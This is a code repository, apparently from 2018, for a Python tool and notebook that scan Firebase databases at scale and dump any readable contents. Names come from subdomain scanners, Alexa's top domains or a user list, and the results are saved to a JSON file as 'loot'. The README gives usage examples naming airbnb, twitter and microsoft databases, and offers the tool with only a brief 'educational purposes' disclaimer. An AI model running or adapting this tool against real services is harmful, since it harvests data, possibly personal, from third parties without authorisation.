├── LICENSE
├── README.md
├── firebase.ipynb
├── firebase.py
└── requirements.txt

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2018 Turr0n

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# firebase
Exploiting vulnerable/misconfigured [Firebase](https://firebase.google.com/) databases

## Disclaimer: The provided software is meant for educational purposes only. Use it at your own discretion; the creator cannot be held responsible for any damage caused. Please use it responsibly!

### Prerequisites
Non-standard Python modules:
* [dnsdumpster](https://github.com/PaulSec/API-dnsdumpster.com)
* [bs4](http://beautiful-soup-4.readthedocs.io/en/latest/)
* [requests](https://github.com/requests/requests)

### Installation
If the following commands run successfully, you are ready to use the script:
```
git clone https://github.com/Turr0n/firebase.git
cd firebase
pip install -r requirements.txt
```

### Usage
```
python3 firebase.py [-h] [--dnsdumpster] [-d /path/to/file.htm] [-o results.json] [-l /path/to/file] [-c 100] [-p 4]
```
Arguments:
```
-h              Show the help message
-d              Absolute path to the downloaded HTML file
-o              Output file name. Default: results.json
-c              Crawl for domains in Alexa's top 1 million. Set how many domains to crawl, for example: 100. Up to 1000000
-p              How many processes to execute. Default: 1
-l              Path to a file containing the DBs to crawl, one DB name per line. This option can't be used with -d or -c
--dnsdumpster   Use the DNSDumpster API to gather DBs
--just-v        Ignore non-vulnerable DBs
--amass         Path to the output file of an amass scan (its [-o] argument)
```

Example:
```
python3 firebase.py -p 4 -o results_1.json -c 150 --dnsdumpster
```
This will look up the first 150 domains in the Alexa file as well as the DBs provided by DNSDumpster. The results will be saved to ```results_1.json``` and the whole script will run using 4 parallel processes.

The script will create a JSON file containing the gathered vulnerable databases and their dumped contents. Each database has a status:
* -2: the DB is not vulnerable
* -1: the DB doesn't exist
* 0: further exploitation may be possible
* 1: vulnerable
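
The results file is just a JSON list of objects, each holding the ```status```, the DB ```url``` and, for vulnerable DBs, the dumped ```data```. If you want to post-process it, something like the following sketch should work (this is not part of the script; it assumes the default output name ```results.json```):
```
import json

# Load the output produced by firebase.py (default output name assumed)
with open('results.json') as f:
    results = json.load(f)

# Keep only the DBs that were flagged as vulnerable (status 1)
vulnerable = [entry['url'] for entry in results if entry['status'] == 1]
print('Vulnerable DBs: {}'.format(len(vulnerable)))
for url in vulnerable:
    print(url)
```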

For better results, head to [pentest-tools.com](https://pentest-tools.com/information-gathering/find-subdomains-of-domain) and run its subdomain scanner against the following domain: ```firebaseio.com```. Once the scan has finished, save the page HTML (Ctrl+S) and use the ```-d [path]``` argument; this allows the script to analyze the subdomains discovered by that service. Further subdomain crawlers might be supported in the future.

The [amass](https://github.com/caffix/amass) scanner by @caffix is now supported! Run any scan you like with that tool against ``firebaseio.com`` using its ``-o`` argument, and the script will digest the output file and crawl the discovered DBs.

Firebase DBs use this structure: ```https://[DB name].firebaseio.com/```. If you are using the ```-l [path]``` argument, the supplied file needs to contain one [DB name] per line, for example:
```
airbnb
twitter
microsoft
```

Using that file will check these DBs: ```https://airbnb.firebaseio.com/.json```, ```https://twitter.firebaseio.com/.json``` and ```https://microsoft.firebaseio.com/.json```.
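
Each of those URLs is simply the database's REST endpoint: requesting it returns the DB contents as JSON when the rules allow anonymous reads, or an error object such as ```{"error" : "Permission denied"}``` otherwise. As a standalone illustration of the check the script performs for every name (the ```check_db``` helper below is only an example, not part of firebase.py):
```
import requests

def check_db(name):
    # Build the same endpoint firebase.py builds for each DB name
    url = 'https://{}.firebaseio.com/.json'.format(name)
    r = requests.get(url, timeout=10).json()
    if isinstance(r, dict) and 'error' in r:
        # e.g. 'Permission denied' (protected) or '404 Not Found' (doesn't exist)
        return url, r['error']
    if r is None:
        return url, 'readable but empty'  # firebase.py reports these as status 0
    return url, 'readable without authentication'  # status 1 in firebase.py

print(check_db('airbnb'))
```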

### Credits

This script is heavily based on the work of the Mobile Threat Team at [appthority](https://www.appthority.com/mobile-threat-center/blog/appthority-discovers-thousands-of-apps-with-firebase-vulnerability-exposing-sensitive-data/). All credits for the research belong to them.

To download the domains from Alexa's top 1 million domains file, the [script](https://gist.github.com/evilpacket/3628941) by @evilpacket is used.
--------------------------------------------------------------------------------
/firebase.ipynb:
--------------------------------------------------------------------------------
{
 "cells": [
  {
   "cell_type": "code",
   "execution_count": 1,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Gathering subdomains using DNSDumpster...\n"
     ]
    }
   ],
   "source": [
    "from dnsdumpster.DNSDumpsterAPI import DNSDumpsterAPI\n",
    "\n",
    "print('Gathering subdomains using DNSDumpster...')\n",
    "results = DNSDumpsterAPI().search('firebaseio.com')\n",
    "domains = [domain['domain'] for domain in results['dns_records']['host']]"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 2,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Gathering subdomains through the downloaded file...\n"
     ]
    }
   ],
   "source": [
    "from bs4 import BeautifulSoup\n",
    "\n",
    "print('Gathering subdomains through the downloaded file...')\n",
    "with open('subdomains.html', 'r') as f:\n",
    "    s = BeautifulSoup(f.read(), 'html.parser')\n",
    "\n",
    "table = s.find('div', class_='col-xs-12').find('table')\n",
    "domains.extend([row.find('a')['href'] for row in table.find('tbody').find_all('tr')[:-1]])"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 15,
   "metadata": {
    "collapsed": true
   },
   "outputs": [],
   "source": [
    "import requests\n",
    "\n",
    "def clean(domain):\n",
    "    if domain.count('http://') == 0:\n",
    "        url = ('https://{}/.json').format(domain)\n",
    "    else:\n",
    "        domain = domain.replace('http', 'https')\n",
    "        url = ('{}.json').format(domain)\n",
    "    return url\n",
    "\n",
    "def work(url):\n",
    "    r = requests.get(url).json()\n",
    "    if 'error' in r.keys():\n",
    "        if r['error'] == 'Permission denied':\n",
    "            return {'status':-1, 'url':url}\n",
    "        else:\n",
    "            return {'status':0, 'url':url, 'data':r}\n",
    "    else:\n",
    "        return {'status':1, 'url':url, 'data':r}"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 16,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Cleaning and looting!\n"
     ]
    }
   ],
   "source": [
    "print('Cleaning and looting!')\n",
    "urls = map(clean, domains)\n",
    "loot = list(map(work, urls))"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 17,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Saving results to results.json\n"
     ]
    }
   ],
   "source": [
    "import json\n",
    "\n",
    "print('Saving results to results.json')\n",
    "with open('results.json', 'w') as f:\n",
    "    json.dump(loot, f)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 36,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Secure databases found: 10\n",
      "Possible vulnerable databases found: 10\n",
      "Vulnerable databases found: 10\n"
     ]
    }
   ],
   "source": [
    "l = {'1':0, '0':0, '-1':0}\n",
    "\n",
    "for result in loot:\n",
    "    l[str(result['status'])] += 1\n",
    "\n",
    "print('Secure databases found: {}'.format(l['-1']))\n",
    "print('Possible vulnerable databases found: {}'.format(l['0']))\n",
    "print('Vulnerable databases found: {}'.format(l['1']))"
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": "Python 3",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.5.2"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 2
}
--------------------------------------------------------------------------------
/firebase.py:
--------------------------------------------------------------------------------
from argparse import ArgumentParser
from multiprocessing import Pool
from time import sleep
import requests
import os.path
import json
import sys

def args():
    parser = ArgumentParser()
    group = parser.add_mutually_exclusive_group()

    group.add_argument('-c', dest='crawl_top', required=False, default=False, type=int, help='Crawl for domains in the top-1m by Alexa. Set how many domains to crawl, for example: 100. Up to 1000000')
    group.add_argument('-l', dest='list', required=False, default=False, help='Path to a file containing the DB names to be checked. One per line')
    parser.add_argument('-o', dest='fn', required=False, default='results.json', help='Output file name. Default: results.json')
    parser.add_argument('-d', dest='path', required=False, default=False, help="Absolute path to the downloaded HTML file")
    parser.add_argument('-p', dest='process', required=False, default=1, type=int, help='How many processes to execute')
    parser.add_argument('--dnsdumpster', action='store_true', required=False, default=False, help='Use the DNSDumpster API to gather DBs')
    parser.add_argument('--just-v', action='store_true', required=False, default=False, help='Ignore non-vulnerable DBs')
    parser.add_argument('--amass', dest='amass', required=False, default=False, help='Path to the output file of an amass scan ([-o] argument)')

    if len(sys.argv) == 1:
        parser.error("No arguments supplied.")

    return parser.parse_args()


def clean(domain):
    '''
    Clean the domain so it is suitable to be crawled.
    '''
    if domain.count('http://') == 0:
        url = ('https://{}/.json').format(domain)
    else:
        domain = domain.replace('http', 'https')
        url = ('{}.json').format(domain)
    return url


def worker(url):
    '''
    Main function in charge of the bulk of the crawling; it assigns a status
    to each DB depending on the response.
    '''
    print('Crawling {} ...'.format(url))
    sleep(0.5) # a bit of delay so we don't hammer the servers
    try:
        r = requests.get(url).json()
    except requests.exceptions.RequestException as e:
        print(e)
        return None # the request failed, so there is no response to classify

    try:
        if 'error' in r.keys():
            if r['error'] == 'Permission denied' and not args_.just_v:
                return {'status':-2, 'url':url} # successfully protected
            elif r['error'] == '404 Not Found' and not args_.just_v:
                return {'status':-1, 'url':url} # doesn't exist
            elif not args_.just_v:
                return {'status':0, 'url':url} # maybe there's a chance for further exploitation
        else:
            return {'status':1, 'url':url, 'data':r} # vulnerable
    except AttributeError:
        '''
        Some DBs may just return null
        '''
        if not args_.just_v:
            return {'status':0, 'url':url}


def load_file():
    '''
    Parse the HTML file with the results of the pentest-tools subdomains scanner.
    '''
    try:
        from bs4 import BeautifulSoup

        with open(args_.path, 'r') as f:
            print('Gathering subdomains through the downloaded file...')
            s = BeautifulSoup(f.read(), 'html.parser')

        table = s.find('div', class_='col-xs-12').find('table')
        return [row.find('a')['href'] for row in table.find('tbody').find_all('tr')[:-1]]

    except IOError as e:
        raise e


def down_tops():
    '''
    Download the specified number of domains in Alexa's top 1M file.
    Credits for the script to @evilpacket
    https://gist.github.com/evilpacket/3628941
    '''
    from subprocess import Popen
    command = "wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv|head -"+str(args_.crawl_top)+" > top-"+str(args_.crawl_top)+".txt; rm top-1m.csv*"

    try:
        Popen(command, shell=True).wait()
    except Exception:
        raise


def tops():
    '''
    Gather the required number of top domains. Download the file if it
    hasn't been downloaded yet. Then, prepare the urls to be crawled.
    '''
    fn = 'top-{}.txt'.format(args_.crawl_top)
    if not os.path.isfile(fn):
        down_tops()

    print('Retrieving {} top domains'.format(args_.crawl_top))
    with open(fn, 'r') as f:
        top_doms = {line.split('.')[0] for line in f}

    return ['https://{}.firebaseio.com/.json'.format(dom) for dom in top_doms]


def amass():
    '''
    From an amass scan output file ([-o] argument), gather the DB urls to crawl.
    '''
    with open(args_.amass) as f:
        dbs = ['https://{}/.json'.format(line.rstrip()) for line in f]

    return dbs


def dns_dumpster():
    from dnsdumpster.DNSDumpsterAPI import DNSDumpsterAPI

    print('Gathering subdomains using DNSDumpster...')
    results = DNSDumpsterAPI().search('firebaseio.com')

    return [domain['domain'] for domain in results['dns_records']['host']]


if __name__ == '__main__':
    args_ = args()
    if not args_.list:
        dbs = []

        if args_.dnsdumpster:
            dbs.extend(dns_dumpster())

        if args_.path:
            dbs.extend(load_file())

        urls = list(set(map(clean, dbs)))
        if args_.crawl_top:
            urls.extend(tops())

        if args_.amass:
            urls.extend(amass())

        print('\nLooting...')
        p = Pool(args_.process)
        loot = [result for result in p.map(worker, urls) if result is not None]

    else:
        with open(args_.list, 'r') as f:
            urls = {'https://{}.firebaseio.com/.json'.format(line.rstrip()) for line in f}

        p = Pool(args_.process)
        loot = [result for result in p.map(worker, urls) if result is not None]

    print('Saving results to {}\n'.format(args_.fn))
    with open(args_.fn, 'w') as f:
        json.dump(loot, f)

    l = {'1':0, '0':0, '-1':0, '-2':0}
    for result in loot:
        l[str(result['status'])] += 1

    print('Secure DBs: {}'.format(l['-2']))
    print('Non-existent (404) DBs: {}'.format(l['-1']))
    print('Possible vulnerable DBs: {}'.format(l['0']))
    print('Vulnerable DBs: {}'.format(l['1']))
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
bs4
requests
dnsdumpster
--------------------------------------------------------------------------------